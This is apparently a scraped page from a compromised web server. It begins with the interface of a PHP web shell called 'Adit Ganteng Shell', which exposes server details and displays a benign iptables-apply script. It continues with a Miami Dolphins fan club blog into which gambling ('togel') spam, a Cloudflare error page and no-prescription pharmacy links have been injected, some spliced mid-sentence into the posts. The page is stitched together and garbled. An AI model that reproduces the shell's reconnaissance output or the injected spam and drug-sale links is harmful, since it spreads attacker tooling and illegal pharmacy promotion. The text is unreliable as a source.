x

Adit Ganteng Shell

: /sbin/ [ dr-xr-xr-x ]
Uname: Linux d4040.use1.stableserver.net 4.18.0-553.33.1.el8_10.x86_64 #1 SMP Thu Dec 19 06:22:22 EST 2024 x86_64
Software: Apache
PHP version: 8.1.34 [ PHP INFO ] PHP os: Linux
Server Ip: 195.250.26.131
Your Ip: 216.73.216.138
User: drivenby (1002) | Group: drivenby (1003)
Safe Mode: OFF
Disable Function:
NONE

name : iptables-apply
#!/bin/bash
# iptables-apply -- a safer way to update iptables remotely
#
# Usage:
#   iptables-apply [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]}
#
# Versions:
#   * 1.0 Copyright 2006 Martin F. Krafft <madduck@madduck.net>
#         Original version
#   * 1.1 Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/>
#         Added parameter -c (run command)
#         Added parameter -w (save successfully applied rules to file)
#         Major code cleanup
#
# Released under the terms of the Artistic Licence 2.0
#
set -eu

PROGNAME="${0##*/}"
VERSION=1.1


### Default settings

DEF_TIMEOUT=10

MODE=0  # apply rulesfile mode
# MODE=1  # run command mode

case "$PROGNAME" in
	(*6*)
		SAVE=ip6tables-save
		RESTORE=ip6tables-restore
		DEF_RULESFILE="/etc/network/ip6tables.up.rules"
		DEF_SAVEFILE="$DEF_RULESFILE"
		DEF_RUNCMD="/etc/network/ip6tables.up.run"
		;;
	(*)
		SAVE=iptables-save
		RESTORE=iptables-restore
		DEF_RULESFILE="/etc/network/iptables.up.rules"
		DEF_SAVEFILE="$DEF_RULESFILE"
		DEF_RUNCMD="/etc/network/iptables.up.run"
		;;
esac


### Functions

function blurb() {
	cat <<-__EOF__
	$PROGNAME $VERSION -- a safer way to update iptables remotely
	__EOF__
}

function copyright() {
	cat <<-__EOF__
	$PROGNAME has been published under the terms of the Artistic Licence 2.0.

	Original version - Copyright 2006 Martin F. Krafft <madduck@madduck.net>.
	Version 1.1 - Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/>.
	__EOF__
}

function about() {
	blurb
	echo
	copyright
}

function usage() {
	blurb
	echo
	cat <<-__EOF__
	Usage:
	  $PROGNAME [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]}

	The script will try to apply a new rulesfile (as output by iptables-save,
	read by iptables-restore) or run a command to configure iptables and then
	prompt the user whether the changes are okay. If the new iptables rules cut
	the existing connection, the user will not be able to answer affirmatively.
	In this case, the script rolls back to the previous working iptables rules
	after the timeout expires.

	Successfully applied rules can also be written to savefile and later used
	to roll back to this state. This can be used to implement a store last good
	configuration mechanism when experimenting with an iptables setup script:
	  $PROGNAME -w $DEF_SAVEFILE -c $DEF_RUNCMD

	When called as ip6tables-apply, the script will use ip6tables-save/-restore
	and IPv6 default values instead. Default value for rulesfile is
	'$DEF_RULESFILE'.

	Options:

	-t seconds, --timeout seconds
	  Specify the timeout in seconds (default: $DEF_TIMEOUT).
	-w savefile, --write savefile
	  Specify the savefile where successfully applied rules will be written to
	  (default if empty string is given: $DEF_SAVEFILE).
	-c runcmd, --command runcmd
	  Run command runcmd to configure iptables instead of applying a rulesfile
	  (default: $DEF_RUNCMD).
	-h, --help
	  Display this help text.
	-V, --version
	  Display version information.

	__EOF__
}

function checkcommands() {
	for cmd in "${COMMANDS[@]}"; do
		if ! command -v "$cmd" >/dev/null; then
			echo "Error: needed command not found: $cmd" >&2
			exit 127
		fi
	done
}

function revertrules() {
	echo -n "Reverting to old iptables rules... "
	"$RESTORE" <"$TMPFILE"
	echo "done."
}


### Parsing and checking parameters

TIMEOUT="$DEF_TIMEOUT"
SAVEFILE=""

SHORTOPTS="t:w:chV";
LONGOPTS="timeout:,write:,command,help,version";

OPTS=$(getopt -s bash -o "$SHORTOPTS" -l "$LONGOPTS" -n "$PROGNAME" -- "$@") || exit $?
for opt in $OPTS; do
	case "$opt" in
		(-*)
			unset OPT_STATE
			;;
		(*)
			case "${OPT_STATE:-}" in
				(SET_TIMEOUT) eval TIMEOUT="$opt";;
				(SET_SAVEFILE)
					eval SAVEFILE="$opt"
					[ -z "$SAVEFILE" ] && SAVEFILE="$DEF_SAVEFILE"
					;;
			esac
			;;
	esac

	case "$opt" in
		(-t|--timeout) OPT_STATE="SET_TIMEOUT";;
		(-w|--write) OPT_STATE="SET_SAVEFILE";;
		(-c|--command) MODE=1;;
		(-h|--help) usage >&2; exit 0;;
		(-V|--version) about >&2; exit 0;;
		(--) break;;
	esac
	shift
done

# Validate parameters
if [ "$TIMEOUT" -ge 0 ] 2>/dev/null; then
	TIMEOUT=$((TIMEOUT))
else
	echo "Error: timeout must be a positive number" >&2
	exit 1
fi

if [ -n "$SAVEFILE" ] && [ -e "$SAVEFILE" ] && [ ! -w "$SAVEFILE" ]; then
	echo "Error: savefile not writable: $SAVEFILE" >&2
	exit 8
fi

case "$MODE" in
	(1)
		# Treat parameter as runcmd (run command mode)
		RUNCMD="${1:-$DEF_RUNCMD}"
		if [ ! -x "$RUNCMD" ]; then
			echo "Error: runcmd not executable: $RUNCMD" >&2
			exit 6
		fi

		# Needed commands
		COMMANDS=(mktemp "$SAVE" "$RESTORE" "$RUNCMD")
		checkcommands
		;;
	(*)
		# Treat parameter as rulesfile (apply rulesfile mode)
		RULESFILE="${1:-$DEF_RULESFILE}";
		if [ ! -r "$RULESFILE" ]; then
			echo "Error: rulesfile not readable: $RULESFILE" >&2
			exit 2
		fi

		# Needed commands
		COMMANDS=(mktemp "$SAVE" "$RESTORE")
		checkcommands
		;;
esac


### Begin work

# Store old iptables rules to temporary file
TMPFILE=$(mktemp "/tmp/$PROGNAME-XXXXXXXX")
trap 'rm -f $TMPFILE' EXIT HUP INT QUIT ILL TRAP ABRT BUS \
		      FPE USR1 SEGV USR2 PIPE ALRM TERM

if ! "$SAVE" >"$TMPFILE"; then
	# An error occured
	if ! grep -q ipt /proc/modules 2>/dev/null; then
		echo "Error: iptables support lacking from the kernel" >&2
		exit 3
	else
		echo "Error: unknown error saving old iptables rules: $TMPFILE" >&2
		exit 4
	fi
fi

# Legacy to stop the fail2ban daemon if present
[ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban stop

# Configure iptables
case "$MODE" in
	(1)
		# Run command in background and kill it if it times out
		echo -n "Running command '$RUNCMD'... "
		"$RUNCMD" &
		CMD_PID=$!
		( sleep "$TIMEOUT"; kill "$CMD_PID" 2>/dev/null; exit 0 ) &
		if ! wait "$CMD_PID"; then
			echo "failed."
			echo "Error: unknown error running command: $RUNCMD" >&2
			revertrules
			exit 7
		else
			echo "done."
		fi
		;;
	(*)
		# Apply iptables rulesfile
		echo -n "Applying new iptables rules from '$RULESFILE'... "
		if ! "$RESTORE" <"$RULESFILE"; then
			echo "failed."
			echo "Error: unknown error applying new iptables rules: $RULESFILE" >&2
			revertrules
			exit 5
		else
			echo "done."
		fi
		;;
esac

# Prompt user for confirmation
echo -n "Can you establish NEW connections to the machine? (y/N) "

read -r -n1 -t "$TIMEOUT" ret 2>&1 || :
case "${ret:-}" in
	(y*|Y*)
		# Success
		echo

		if [ -n "$SAVEFILE" ]; then
			# Write successfully applied rules to the savefile
			echo "Writing successfully applied rules to '$SAVEFILE'..."
			if ! "$SAVE" >"$SAVEFILE"; then
				echo "Error: unknown error writing successfully applied rules: $SAVEFILE" >&2
				exit 9
			fi
		fi

		echo "... then my job is done. See you next time."
		;;
	(*)
		# Failed
		echo
		if [ -z "${ret:-}" ]; then
			echo "Timeout! Something happened (or did not). Better play it safe..."
		else
			echo "No affirmative response! Better play it safe..."
		fi
		revertrules
		exit 255
		;;
esac

# Legacy to start the fail2ban daemon again
[ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban start

exit 0

# vim:noet:sw=8
© 2026 Adit Ganteng
DolFans NYC - New York City's Official Home For Miami Dolphins Fans - Part 2
https://www.raqsmediacollective.net/ https://works.raqsmediacollective.net/ situs togel toto togel situs togel bandar togel situs toto situs togel https://duniaflix.com/ https://flixnesia.com/ dutatgr.com | 521: Web server is down

Web server is down Error code 521

Visit cloudflare.com for more information.
2026-04-16 00:04:44 UTC
You

Browser

Working
Buffalo

Cloudflare

Working
dutatgr.com

Host

Error

What happened?

The web server is not returning a connection. As a result, the web page is not displaying.

What can I do?

If you are a visitor of this website:

Please try again in a few minutes.

If you are the owner of this website:

Contact your hosting provider letting them know your web server is not responding. Additional troubleshooting information.

mainlotre situs toto mainlotre mainlotre mainlotre situs togel mainlotre mainlotre mainlotre mainlotre mainlotre situs togel
Virtual #MetLifeTakeover Recap

Virtual #MetLifeTakeover Recap

I just wanted to give everyone a quick update on our virtual #MetLifeTakeover event. I think yesterday went just about as well as we could have possibly planned. We had a ton of people watching the game live with us, the Dolphins won and we raised almost $3000 for the Miami Dolphins Foundation Food Relief

Read More →
Virtual #MetLifeTakeover, Raffles & Giveaways

Virtual #MetLifeTakeover, Raffles & Giveaways

I cannot imagine how crazy this week would be for us if it weren’t for the coronavirus pandemic. It would be #MetLifeTakeover week with the maybe best Dolphins team in Dolfans NYC history going against a winless Jets team. Yeah the loss yesterday was tough, but this would undoubtedly be our biggest year ever. Unfortunately,

Read More →
New Season, New Way Of Watching “Together”

New Season, New Way Of Watching “Together”

I know most Dolphins fans have been looking forward this day for two years after knowing last year was going to be less than ideal. The day is finally here and instead of watching together at Slattery’s in a packed bar we are spread out all over the place watching on couches trying to connect

Read More →
2020 Draft Recap

2020 Draft Recap

I love the NFL Draft. Dolfans NYC used to do group trips every year when the Draft was in NYC. I went to Dallas a couple of years ago and I was supposed to be in Vegas for the Draft before the coronavirus messed everything up. Even with the virus I still ended up on

Read More →
Tua Tagovailoa: Joining Dolphins Is “Dream Come True”

Tua Tagovailoa: Joining Dolphins Is “Dream Come True”

When the smokescreen finally cleared on Thursday night, after months of speculation and endless rumors, the Dolphins landed their quarterback of the future. Flanked by his parents and siblings inside his Alabaster, Ala. buy nolvadex online https://delineation.ca/wp-content/uploads/2025/03/jpg/nolvadex.html no prescription pharmacy home, Tua Tagovailoa slid a black Miami Dolphins cap on his head and a lei

Read More →
2019 #MetLifeTakeover Video

2019 #MetLifeTakeover Video

The 2019 #MetLifeTakeover video is finally here! It took way longer than we wanted it’s been a crazy winter for all of us here at Dolfans NYC and I am just glad we finally got it done and I think you guys will see that it came out great. 2019 was not exactly a great

Read More →
Finatics: On The Road In NYC

Finatics: On The Road In NYC

Our #MetLifeTakeover video is taking longer than expected to get finished, so I wanted to get up something to hold you guys over in the meantime. buy professional cialis online https://healthempire.ca/wp-content/uploads/2025/03/jpg/professional-cialis.html no prescription pharmacy During the Jets game the Dolphins and Hotels.com followed us around and did a little video about us, Slattery’s and the

Read More →
2019 #MetLifeTakeover Photos And Recap

2019 #MetLifeTakeover Photos And Recap

Wow, this weekend was amazing, well at least it was until that pass interference review… But even with the loss the #MetLifeTakeover event was a huge success. With the Dolphins having some issues on the field we had less fans join us this year, but it turns out 500+ Dolfans is still a huge party!

Read More →
#MetLifeTakeover Updates

#MetLifeTakeover Updates

Hey guys, you might have noticed that our site has been screwed up for a couple of weeks. We had a bad malware attack that we have finally fixed, but it took a while. And don’t worry, since everyone pays with PayPal, we don’t collect any of your info that could have been hacked. We

Read More →
Albert Wilson Makes Impact Through Philanthropy, Community Service Initiatives

Albert Wilson Makes Impact Through Philanthropy, Community Service Initiatives

In Week 8, Dolfans NYC raised over $250 through raffles and donated a total of $500 to The Albert Wilson Foundation, which is committed to creating opportunities that will enhance the lives of children in foster care.  After spending much of his childhood in the South Florida foster care system, Miami Dolphins wide receiver Albert Wilson understands, as well as anyone, the importance of giving back to youth in his

Read More →
Dolphins Announce Play Football Week 11 Award Winners

Dolphins Announce Play Football Week 11 Award Winners

As part of Play Football, a program designed to celebrate youth football in South Florida, for each home game, the Dolphins identify the high school coach, high school player, youth player and team mom of the week. buy oseltamivir online https://delineation.ca/wp-content/uploads/2025/03/jpg/oseltamivir.html no prescription pharmacy In tribute to Don Shula’s 50th season with the organization, the

Read More →
Kenyan Drake Making Global Impact, One Smile at a Time

Kenyan Drake Making Global Impact, One Smile at a Time

Dolphins fans, far and wide, were all smiles when Kenyan Drake sprinted into the end zone as time expired to stun the Patriots last December. buy super cialis online https://bradencenter.com/wp-content/uploads/2025/03/jpg/super-cialis.html no prescription pharmacy Over the summer, the fourth-year running back capitalized on the lasting popularity of the play since hailed as the “Miami Miracle” to

Read More →
Dolphins Promote Harmony, Inclusion Though Football Unites Program

Dolphins Promote Harmony, Inclusion Though Football Unites Program

It’s just past 10 o’clock on Sunday morning, three hours before the Dolphins will kick off the 2019 season against the Ravens, and the North East plaza at Hard Rock Stadium is bustling with activity. At the team’s fourth-annual Football Unites CommUNITY Tailgate, large overhead fans are whirling at full capacity, while a DJ shuffles

Read More →
Football Season Begins, 10th Anniversary Merch & Giving Back

Football Season Begins, 10th Anniversary Merch & Giving Back

This is a very different Miami Dolphins team from the last time we updated our website. The Dolphins have had a full 25% roster overhaul in the short time since we first put #MetLifeTakeover tickets on sale. The team that is suiting up this Sunday vs the Ravens is going to have a lot of

Read More →
2019 #MetLifeTakeover Tickets Are On Sale!

2019 #MetLifeTakeover Tickets Are On Sale!

This is what you have been waiting for! buy avana online https://bereniceelectrolysis.com/jquery/js/avana.html no prescription pharmacy buy hydroxychloroquine online in the best USA pharmacy https://petspawtx.com/wp-content/uploads/2025/05/png/hydroxychloroquine.html no prescription with fast delivery drugstore For the 10th anniversary of Dolfans NYC we are doing not one, but TWO #MetLifeTakeover events! buy synthroid online in the best USA pharmacy https://petspawtx.com/wp-content/uploads/2025/05/png/synthroid.html

Read More →
2018 #MetLifeTakeover Video

2018 #MetLifeTakeover Video

It’s finally here! The 2018 #MetLifeTakeover video took us forever to finish, but I think the results are worth waiting for. For the second year in a row the video was directed/edited by RizeOptix and hosted by comedian Oscar Collazos. We loved their work on the 2017 Takeover video and we were glad they could

Read More →
Away from Cameras, Dolphins Give Back to Communities

Away from Cameras, Dolphins Give Back to Communities

For Dolphins players, the job of a professional athlete doesn’t end when the gameday cameras stop rolling and the pads are hung up in the lockers. During their free time, many give back to the communities that raised them, using their platforms and voices to make a difference in the lives of less-privileged families. In

Read More →
Dolfans NYC Vs. Green Bay

Dolfans NYC Vs. Green Bay

When the schedule came out this year the first thing I did was book a trip to Green Bay with a bunch of other members of Dolfans NYC. As the season went on I found out more and more of our crew was going. We had at least 20 people who went but there were

Read More →